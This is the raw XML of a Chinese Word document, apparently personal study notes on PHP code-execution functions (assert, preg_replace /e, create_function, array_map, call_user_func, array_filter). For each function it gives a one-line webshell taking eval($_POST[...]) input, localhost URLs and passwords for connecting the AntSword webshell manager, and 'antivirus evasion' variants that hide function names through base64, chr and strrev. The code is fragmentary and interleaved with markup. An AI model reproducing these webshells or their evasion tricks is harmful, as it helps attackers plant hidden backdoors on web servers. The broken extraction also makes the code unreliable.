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复现代码执行各种类型,并将每个函数进行自定义改写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13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assert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#assert函数是直接将传入的参数当成PHP代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不需要以分号结尾</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.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默认功能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7FAFF"/>
              </w:rPr>
              <w:t>&lt;?php</w:t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7FA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@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7FAFF"/>
              </w:rPr>
              <w:t>assert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(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="660000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>$_POST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[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="067D17"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>'cmd'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7FAFF"/>
              </w:rPr>
              <w:t>]);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9865" cy="406019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base64_encode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'a'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'sse'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ord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'r'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return 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public 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array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base64_decode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chr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$str4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't'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$str4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$t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var_dump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$cmd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$_POST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'cmd'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echo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$b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 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$cmd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 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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> //这里很关键 不这样级别为1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$b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instrText xml:space="preserve"> HYPERLINK "http://www.localhost.com/diy/codeExec/work/mianshaAssert2.php?cmd=eval($_POST[2])" </w:instrTex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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>http://www.localhost.com/diy/codeExec/work/mianshaAssert2.php?cmd=eval($_POST[2])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密码:2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连接蚁剑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="300990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preg_replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>( 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"https://www.php.net/manual/zh/language.pseudo-types.php" \l "language.types.mixed"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mixed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 $pattern , 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"https://www.php.net/manual/zh/language.pseudo-types.php" \l "language.types.mixed"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mixed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 $</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, 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"https://www.php.net/manual/zh/language.pseudo-types.php" \l "language.types.mixed"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mixed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> $subject  )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//第三个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">subject  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参数需要满足第一个参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的条件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//本函数功能 :将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">subject  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中匹配到的正则的内容更改为$str的内容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如果第一个参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正则条件类似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 /e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,那么会将$str中的字符串当作代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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默认情况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第三个参数需要满足第一个参数的条件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本函数功能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 xml:space="preserve"> :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将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 xml:space="preserve">subject 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中匹配到的正则的内容更改为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$str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的内容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preg_replace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'/it/e'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'just do it'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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl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1109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第三个参数需要满足第一个参数的条件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本函数功能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 xml:space="preserve"> :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将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 xml:space="preserve">subject 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中匹配到的正则的内容更改为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$str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的内容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base64_encode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'preg'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ord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'_'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'replace'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return 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public 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array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base64_decode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chr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'/it/e'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'just do it'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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p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92202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fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.localhost.com/diy/codeExec/work/preg_replaceTest.php?1=eval($_POST[2])" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>http://www.localhost.com/diy/codeExec/work/preg_replaceTest.php?1=eval($_POST[2])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang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87528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create_function()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create_function:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="42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创造一个匿名函数,内部生存一个标准的函数模型 :  function(参数) { 函数体 }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默认情况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//123) || phpinfo());}/*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$code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"return (strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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a)-strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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 xml:space="preserve">b)+"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.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"strlen(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));"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//return (strlen($a)-strlen($b)+strlen(pio));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$func2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function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$b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strlen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)-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strlen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$b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)+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strlen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i/>
                <w:color w:val="871094"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>pio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$lambda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create_function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'$a,$b'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"return (strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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a)-strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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 xml:space="preserve">b)+"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.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"strlen(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));"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$array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'reall long string here,boy'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'this'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'midding lenth'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'larget'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usort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$lambda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fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default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instrText xml:space="preserve"> HYPERLINK "http://www.localhost.com/diy/codeExec/work/createFunction.php?c=eval($_POST[2])" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default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fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="9"/>
                <w:rFonts w:hint="default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http://www.localhost.com/diy/codeExec/work/createFunction.php?c=eval($_POST[2])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default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fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default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密码:2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//123) || phpinfo());}/*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$code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"return (strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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a)-strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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 xml:space="preserve">b)+"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.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"strlen(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));"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//return (strlen($a)-strlen($b)+strlen(pio));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$func2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function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$b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strlen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)-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strlen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$b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)+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strlen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i/>
                <w:color w:val="871094"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>pio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base64_encode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'create'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ord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'_'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'function'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return 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public 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array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base64_decode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chr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string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$t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$cmd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$lambda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'$a,$b'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"return (strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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a)-strlen(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="0037A6"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>\$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 xml:space="preserve">b)+"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.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"strlen(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$cmd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));"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$array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'reall long string here,boy'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'this'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'midding lenth'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'larget'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usort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$lambda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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl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1283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0175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"http://www.localhost.com/diy/codeExec/work/createFunction.php?c=eval($_POST[2])"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http://www.localhost.com/diy/codeExec/work/createFunction.php?c=eval($_POST[2])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密码:2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13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Array_map()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$func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'func'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$cmd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'cmd'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] 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$cmd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//assert('phpinfo();');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//die();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如果说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,$func== assert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//$array[0] = 'phpinfo();'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//assert('phpinfo();')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本质上，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array_map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函数就是从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$array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数组中取出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元素，然后，使用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$func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进行一个处理，并最终将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结果进行一个返回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$new_array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array_map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echo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$new_array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"http://www.localhost.com/diy/codeExec/work/arrayMapTest.php?func=assert&amp;cmd=eval($_POST[1])"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http://www.localhost.com/diy/codeExec/work/arrayMapTest.php?func=assert&amp;cmd=eval($_POST[1])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密码:1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免杀：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$func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'func'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$cmd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'cmd'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] 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$cmd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//assert('phpinfo();');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//die();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如果说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,$func== assert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//$array[0] = 'phpinfo();'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//assert('phpinfo();')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本质上，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array_map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函数就是从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$array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数组中取出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元素，然后，使用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$func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进行一个处理，并最终将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t>结果进行一个返回</w:t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??" w:hAnsi="??" w:eastAsia="??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base64_encode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'array'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ord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'_'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'map'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return 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public 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array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base64_decode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chr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string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$t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$new_array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echo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$new_array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instrText xml:space="preserve"> HYPERLINK "http://www.localhost.com/diy/codeExec/work/arrayMapTest.php?func=assert&amp;cmd=eval($_POST[1])" </w:instrTex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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>http://www.localhost.com/diy/codeExec/work/arrayMapTest.php?func=assert&amp;cmd=eval($_POST[1])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密码:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p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00926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call_user_function()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@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call_user_func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'assert'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'cmd'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$call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$var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$res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$var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$res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$call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'func'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'cmd'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instrText xml:space="preserve"> HYPERLINK "http://www.localhost.com/diy/codeExec/work/callUserFunc.php?func=assert&amp;cmd=eval($_POST[1])" </w:instrTex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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>http://www.localhost.com/diy/codeExec/work/callUserFunc.php?func=assert&amp;cmd=eval($_POST[1])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密码:1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base64_encode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'call'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ord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'_'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'user_func'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return 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public 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array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base64_decode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chr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string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$t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echo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$cmd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'cmd'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$fun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'func'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//@call_user_func('assert',$_GET['cmd']);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B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public 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p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$cmd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$cmd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B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())-&gt;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p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$cmd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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0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"http://www.localhost.com/diy/codeExec/work/callUserFunc.php?func=assert&amp;cmd=eval($_POST[1])"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</w:rPr>
              <w:t>http://www.localhost.com/diy/codeExec/work/callUserFunc.php?func=assert&amp;cmd=eval($_POST[1])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline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密码:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p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264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987040"/>
            <wp:effectExtent l="0" t="0" r="139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call_user_func_array()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13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call_user_func_array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'assert'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,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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>POST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'a'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密码:a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免杀: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base64_encode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'call_user'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ord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'_'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'func_array'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return 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public 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array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base64_decode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chr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string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$t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$fun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'func'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B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public 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p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$cmd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$cmd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B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())-&gt;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p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'a'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instrText xml:space="preserve"> HYPERLINK "http://www.localhost.com/diy/codeExec/work/create_user_func_array.php?func=assert&amp;a=eval($_POST[1])" </w:instrTex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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>http://www.localhost.com/diy/codeExec/work/create_user_func_array.php?func=assert&amp;a=eval($_POST[1])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密码:1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1135" cy="2346325"/>
            <wp:effectExtent l="0" t="0" r="190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278"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK277"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>array_filter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">() 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$array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4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5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6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7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8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9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$func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$var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$var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% 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 xml:space="preserve">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== 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=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'func'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$m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$_POST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'm'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$array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$m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4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5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6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7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8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9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//http://www.localhost.com/diy/arrayMap/arrayFilter.php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$res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array_filter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var_dump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$res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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13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"http://www.localhost.com/diy/codeExec/work/arrayFilter.php?func=assert"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http://www.localhost.com/diy/codeExec/work/arrayFilter.php?func=assert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密码:m</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/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免杀:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13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952500"/>
            <wp:effectExtent l="0" t="0" r="571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&lt;?php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$array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4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5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6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7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8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9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$func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$var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$var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% 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 xml:space="preserve">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== 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=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$_GET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'func'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$m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$_POST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'm'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$array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$m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"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4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5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6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7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8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9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t>//http://www.localhost.com/diy/arrayMap/arrayFilter.php</w:t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8C8C8C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base64_encode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'array'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$str2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ord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'_'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67D17"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>'filter'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return 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Class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public function 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array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){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$str1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base64_decode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0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chr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$str3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strrev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[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="1750EB"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>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]);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   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return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>string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$str2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.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$str3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    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}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$t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$arr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$t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demo1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0033B3"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t xml:space="preserve">new </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>createFunc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$cc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-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="00627A"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>create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 xml:space="preserve">$res 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 xml:space="preserve">= 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$cc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$array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,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$func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br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>var_dump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(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="660000"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>$res</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono"/>
                <w:color w:val="080808"/>
                <w:sz w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13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"http://www.localhost.com/diy/codeExec/work/arrayFilter.php?func=assert"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http://www.localhost.com/diy/codeExec/work/arrayFilter.php?func=assert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密码:m</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="301752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altName w:val="Calibri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F2016"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="150F20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42A07"/>
    <w:rsid w:val="004130C3"/>
    <w:rsid w:val="00553C3B"/>
    <w:rsid w:val="005C01AD"/>
    <w:rsid w:val="006150F9"/>
    <w:rsid w:val="00625938"/>
    <w:rsid w:val="006B08CB"/>
    <w:rsid w:val="00706AE9"/>
    <w:rsid w:val="00DF668C"/>
    <w:rsid w:val="00EF392A"/>
    <w:rsid w:val="010914FC"/>
    <w:rsid w:val="01A85B4B"/>
    <w:rsid w:val="01D44F5E"/>
    <w:rsid w:val="01E53D15"/>
    <w:rsid w:val="01FD25ED"/>
    <w:rsid w:val="01FE17A8"/>
    <w:rsid w:val="030F05CF"/>
    <w:rsid w:val="03D9634B"/>
    <w:rsid w:val="03DD0DFE"/>
    <w:rsid w:val="03EB6532"/>
    <w:rsid w:val="04213D47"/>
    <w:rsid w:val="04F709DA"/>
    <w:rsid w:val="0516233C"/>
    <w:rsid w:val="06061F21"/>
    <w:rsid w:val="06F9043A"/>
    <w:rsid w:val="070E4B1E"/>
    <w:rsid w:val="0721712E"/>
    <w:rsid w:val="07B86F50"/>
    <w:rsid w:val="07C203B5"/>
    <w:rsid w:val="07CF4440"/>
    <w:rsid w:val="08145259"/>
    <w:rsid w:val="083E34C4"/>
    <w:rsid w:val="08D95B3D"/>
    <w:rsid w:val="08E9150B"/>
    <w:rsid w:val="09892569"/>
    <w:rsid w:val="09BD6FF6"/>
    <w:rsid w:val="09E34193"/>
    <w:rsid w:val="0A904992"/>
    <w:rsid w:val="0B6D23D0"/>
    <w:rsid w:val="0B7D1A3A"/>
    <w:rsid w:val="0C9013E1"/>
    <w:rsid w:val="0CB745A0"/>
    <w:rsid w:val="0CEC5B7B"/>
    <w:rsid w:val="0DBF41AD"/>
    <w:rsid w:val="0E112319"/>
    <w:rsid w:val="0E3E0EEC"/>
    <w:rsid w:val="0E536962"/>
    <w:rsid w:val="0EAF33F8"/>
    <w:rsid w:val="0EE219B1"/>
    <w:rsid w:val="0F6427BA"/>
    <w:rsid w:val="0FAF733C"/>
    <w:rsid w:val="0FBD37F9"/>
    <w:rsid w:val="0FC357C7"/>
    <w:rsid w:val="0FD62A70"/>
    <w:rsid w:val="0FEE69E5"/>
    <w:rsid w:val="107E2822"/>
    <w:rsid w:val="111A3CC6"/>
    <w:rsid w:val="114D30E1"/>
    <w:rsid w:val="11CE7A28"/>
    <w:rsid w:val="11E2061B"/>
    <w:rsid w:val="1222397D"/>
    <w:rsid w:val="12592081"/>
    <w:rsid w:val="130E478F"/>
    <w:rsid w:val="133D2CC1"/>
    <w:rsid w:val="133E6838"/>
    <w:rsid w:val="13566455"/>
    <w:rsid w:val="146D3286"/>
    <w:rsid w:val="14B91F54"/>
    <w:rsid w:val="14D66F1D"/>
    <w:rsid w:val="150F12B8"/>
    <w:rsid w:val="151C788D"/>
    <w:rsid w:val="15FC4682"/>
    <w:rsid w:val="17081B41"/>
    <w:rsid w:val="174300CD"/>
    <w:rsid w:val="174E2A9E"/>
    <w:rsid w:val="17DD6A56"/>
    <w:rsid w:val="18093A12"/>
    <w:rsid w:val="183D18F6"/>
    <w:rsid w:val="189E7325"/>
    <w:rsid w:val="193406E4"/>
    <w:rsid w:val="193E4F96"/>
    <w:rsid w:val="1A813EDE"/>
    <w:rsid w:val="1B4B6373"/>
    <w:rsid w:val="1BB66DBD"/>
    <w:rsid w:val="1BCA0E0E"/>
    <w:rsid w:val="1BCC08FE"/>
    <w:rsid w:val="1BE418D5"/>
    <w:rsid w:val="1C76343C"/>
    <w:rsid w:val="1D5774CE"/>
    <w:rsid w:val="1D883780"/>
    <w:rsid w:val="1E8F606E"/>
    <w:rsid w:val="1ECB6B82"/>
    <w:rsid w:val="1EE55405"/>
    <w:rsid w:val="1FD63357"/>
    <w:rsid w:val="1FE261FF"/>
    <w:rsid w:val="21CB6F73"/>
    <w:rsid w:val="22D91F0D"/>
    <w:rsid w:val="234B55CA"/>
    <w:rsid w:val="23F9209D"/>
    <w:rsid w:val="243264B1"/>
    <w:rsid w:val="24797BFA"/>
    <w:rsid w:val="24F01297"/>
    <w:rsid w:val="252D3185"/>
    <w:rsid w:val="262A4A9F"/>
    <w:rsid w:val="273F4729"/>
    <w:rsid w:val="28467FF2"/>
    <w:rsid w:val="28655E9E"/>
    <w:rsid w:val="289610A2"/>
    <w:rsid w:val="28D67022"/>
    <w:rsid w:val="291778AA"/>
    <w:rsid w:val="298647E7"/>
    <w:rsid w:val="29B93FAA"/>
    <w:rsid w:val="2A7B12D3"/>
    <w:rsid w:val="2B236844"/>
    <w:rsid w:val="2B781BDB"/>
    <w:rsid w:val="2C2B68EC"/>
    <w:rsid w:val="2CA47FAB"/>
    <w:rsid w:val="2D0A7D61"/>
    <w:rsid w:val="2D8203A1"/>
    <w:rsid w:val="2D9114B0"/>
    <w:rsid w:val="2DBD1AED"/>
    <w:rsid w:val="2DDD2477"/>
    <w:rsid w:val="2E013A7B"/>
    <w:rsid w:val="2E527DD1"/>
    <w:rsid w:val="2FBE3EE9"/>
    <w:rsid w:val="2FCF7A73"/>
    <w:rsid w:val="301568D7"/>
    <w:rsid w:val="31017E3A"/>
    <w:rsid w:val="322B02F3"/>
    <w:rsid w:val="323645B0"/>
    <w:rsid w:val="328F2375"/>
    <w:rsid w:val="329C712A"/>
    <w:rsid w:val="32D832A3"/>
    <w:rsid w:val="32F347CE"/>
    <w:rsid w:val="33B43D8E"/>
    <w:rsid w:val="33FA4431"/>
    <w:rsid w:val="3439026A"/>
    <w:rsid w:val="3463441A"/>
    <w:rsid w:val="34784B01"/>
    <w:rsid w:val="34D727B1"/>
    <w:rsid w:val="3536551A"/>
    <w:rsid w:val="354A36AC"/>
    <w:rsid w:val="35AA3F2F"/>
    <w:rsid w:val="35B9147A"/>
    <w:rsid w:val="3623693F"/>
    <w:rsid w:val="363F41CC"/>
    <w:rsid w:val="365E5EC0"/>
    <w:rsid w:val="36653D9E"/>
    <w:rsid w:val="367F47FB"/>
    <w:rsid w:val="37105842"/>
    <w:rsid w:val="37B91DD6"/>
    <w:rsid w:val="37DD653C"/>
    <w:rsid w:val="38C31311"/>
    <w:rsid w:val="38F07001"/>
    <w:rsid w:val="39105BEE"/>
    <w:rsid w:val="391D02CD"/>
    <w:rsid w:val="3A515249"/>
    <w:rsid w:val="3A890530"/>
    <w:rsid w:val="3AD72691"/>
    <w:rsid w:val="3B8401E0"/>
    <w:rsid w:val="3C2968D5"/>
    <w:rsid w:val="3C624A3D"/>
    <w:rsid w:val="3D76591B"/>
    <w:rsid w:val="3D7E6E62"/>
    <w:rsid w:val="3DD674AA"/>
    <w:rsid w:val="3E5300C8"/>
    <w:rsid w:val="3E6F002E"/>
    <w:rsid w:val="3F164C80"/>
    <w:rsid w:val="3F61543F"/>
    <w:rsid w:val="40220C5A"/>
    <w:rsid w:val="404355DC"/>
    <w:rsid w:val="417B4FCD"/>
    <w:rsid w:val="41C90779"/>
